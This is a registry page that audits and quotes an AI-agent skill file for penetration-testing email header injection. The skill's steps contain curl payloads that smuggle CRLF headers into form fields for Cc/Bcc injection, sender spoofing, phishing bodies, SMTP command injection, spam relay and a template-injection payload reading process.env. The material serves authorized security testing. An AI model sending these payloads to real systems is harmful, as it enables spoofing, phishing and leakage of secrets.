Atlas / Skills / mukul975 / Testing For Email Header Injection

Testing For Email Header InjectionSAFE

skills/mukul975/testing-for-email-header-injection

817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains ·

Verdict
SAFE
Grade
B
Trust score
89 /100
Version
1.0
Hosts
—
License
Apache-2.0
Stars
33,870
01

Overview

817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains ·

Read from source at commit 6c59587be632OBSERVED · 2026-10-07
02

What it tells the agent

The instruction file, verbatim from the audited commit — this is the text the model reads, and the surface the audit's instruction layer examines. Quoted here so you can judge it without cloning anything.

---
name: testing-for-email-header-injection
description: Tests web application email functionality (contact forms, password reset,
  newsletter subscriptions) for CRLF/SMTP header injection using Burp Suite and OWASP ZAP,
  checking whether attackers can inject headers, modify recipients, or abuse forms for
  spam relay. Use when testing any user-input-driven email-sending feature during a
  penetration test.
domain: cybersecurity
subdomain: web-application-security
tags:
- email-injection
- smtp-injection
- crlf-injection
- header-injection
- spam-relay
- contact-form
- email-security
version: '1.0'
author: mahipal
license: Apache-2.0
nist_csf:
- PR.PS-01
- ID.RA-01
- PR.DS-10
- DE.CM-01
mitre_attack:
- T1190
- T1059.007
- T1505.003
- T1083
- T1055
---

# Testing for Email Header Injection

## When to Use
- When testing contact forms, feedback forms, or "email a friend" functionality
- During assessment of password reset email functionality
- When testing newsletter subscription or notification email systems
- During penetration testing of applications that send emails based on user input
- When auditing email-related API endpoints for header injection

## Prerequisites
- Burp Suite for intercepting and modifying HTTP requests
- Understanding of SMTP protocol and email header structure
- Knowledge of CRLF injection techniques (\r\n sequences)
- Test email accounts for receiving injected emails
- Access to application features that trigger email sending
- SMTP server logs access for monitoring injection attempts

## Workflow

### Step 1 — Identify Email Injection Points
```bash
# Identify form fields that end up in email headers:
# - "From" name or email address fields
# - "To" or "CC" fields in sharing features
# - Subject line inputs
# - Reply-To fields

# Common endpoints:
# POST /contact - Contact forms
# POST /share - Share via email features
# POST /invite - Invitation systems
# POST /api/send-email - Email API endpoints
# POST /forgot-password - Password reset forms

# Test basic functionality first
curl -X POST http://target.com/contact \
  -d "name=Test&[email protected]&subject=Hello&message=Test message"
```

### Step 2 — Test for CRLF Header Injection
```bash
# Inject additional email headers via CRLF in the email field
curl -X POST http://target.com/contact \
  -d "name=Test&[email protected]%0ACc:[email protected]&message=Test"

# Inject BCC header
curl -X POST http://target.com/contact \
  -d "name=Test&[email protected]%0ABcc:[email protected]&message=Test"

# Inject via the name field
curl -X POST http://target.com/contact \
  -d "name=Test%0ACc:[email protected]&[email protected]&message=Test"

# Inject via subject field
curl -X POST http://target.com/contact \
  -d "name=Test&[email protected]&subject=Hello%0ABcc:[email protected]&message=Test"

# Try different CRLF encoding variants
# %0D%0A (CRLF)
curl -X POST http://target.com/contact \
  -d "[email protected]%0D%0ACc:[email protected]"

# %0A (LF only)
curl -X POST http://target.com/contact \
  -d "[email protected]%0ACc:[email protected]"

# %0D (CR only)
curl -X POST http://target.com/contact \
  -d "[email protected]%0DCc:[email protected]"

# Double encoding
curl -X POST http://target.com/contact \
  -d "[email protected]%250ACc:[email protected]"
```

### Step 3 — Inject Custom Email Content
```bash
# Override email body by injecting Content-Type and body
curl -X POST http://target.com/contact \
  -d "[email protected]%0AContent-Type:text/html%0A%0A<h1>Phishing</h1>"

# Inject additional MIME parts
curl -X POST http://target.com/contact \
  -d "[email protected]%0AContent-Type:multipart/mixed;boundary=boundary123%0A--boundary123%0AContent-Type:text/html%0A%0A<script>alert(1)</script>"

# Override From header for email spoofing
curl -X POST http://target.com/contact \
  -d "[email protected]%0AFrom:[email protected]"

# Inject Reply-To for phishing
curl -X POST http://target.com/contact \
  -d "[email protected]%0AReply-To:[email protected]"
```

### Step 4 — Test IMAP/SMTP Injection
```bash
# IMAP command injection via email field
curl -X POST http://target.com/webmail/search \
  -d "query=test%0AEXAMINE INBOX"

# SMTP command injection
curl -X POST http://target.com/api/send \
  -d "[email protected]%0ARCPT TO:[email protected]"

# SMTP VRFY command injection
curl -X POST http://target.com/api/verify \
  -d "[email protected]%0AVRFY admin"

# Test SMTP relay abuse
curl -X POST http://target.com/contact \
  -d "[email protected]%0ATo:[email protected]%0ATo:[email protected]%0ATo:[email protected]"
```

### Step 5 — Test JSON-Based Email APIs
```bash
# JSON API header injection
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":"[email protected]\nCc:[email protected]","subject":"Test","body":"Test"}'

# Array injection for multiple recipients
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":["[email protected]","[email protected]"],"subject":"Test","body":"Test"}'

# Template injection in email body
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":"[email protected]","subject":"Test","body":"{{constructor.constructor(\"return process.env\")()}}"}'
```

### Step 6 — Validate Findings
```bash
# Check if injected CC/BCC emails were received
# Monitor [email protected] inbox for received copies

# Verify header injection via email raw source
# In received email, check "View Original" or "Show Headers"
# Look for injected Cc:, Bcc:, From:, or Reply-To: headers

# Test if the application is usable as a spam relay
# by injecting multiple recipients in BCC

# Document the full injection chain
# 1. Injection point (which field)
# 2. Encoding required (CRLF, URL encoding)
# 3. Impact (spam relay, phishing, data theft)
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| CRLF Injection | Injecting carriage return and line feed chara
03

Trust audit

SAFEgrade B · trust 89/100 Nothing in the source contradicts what it says it does. Grade A is reserved for packages that have also passed the behavioural sandbox.

LayerWhat it checksResult
L0Provenance & inventoryPASS
L1Static analysis of the codePASS
L2Instruction surface (what it tells the agent)PASS
L3Class-specific surfacePASS
L4Behavioural (sandbox)SKIPPED

What the source does

Filesystem
none-observed
Network
declared (2 observation(s))
Shell
none-observed
Dependencies
pinned
Secrets in source
none-found

Findings (0)

No findings outside the package's declared scope.

Gates applied: no_behavioural_pass.

Audited 2026-10-07 · audit v0.4.1 · source sha 6c59587be632full audit observations/trust-audit/skill/mukul975__testing-for-email-header-injection.json · Report an issue / request a re-scan
04

Audit history

Every audit this skill has had.

DateSourceVerdictGradeScoreChange
2026-10-076c59587be632SAFEB89first audit
05

Questions

What does the Testing For Email Header Injection skill do?

817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains ·

Is Testing For Email Header Injection safe to install?

The audit found nothing in the source that contradicts what it says it does, and graded it B (89/100). Grade A is held back for packages that have also passed a sandboxed behavioural run, which is why a clean skill reads B.

What can Testing For Email Header Injection access on my machine?

The audit observed that it reaches the network. Each of those is consistent with what it says it does. Secrets in the source: none found.

How current is this page?

The grade is for one exact copy of the source (6c59587be632), read on 2026-10-07. The repository is watched, and a new audit runs when it changes — this is the first audit.

Advertisement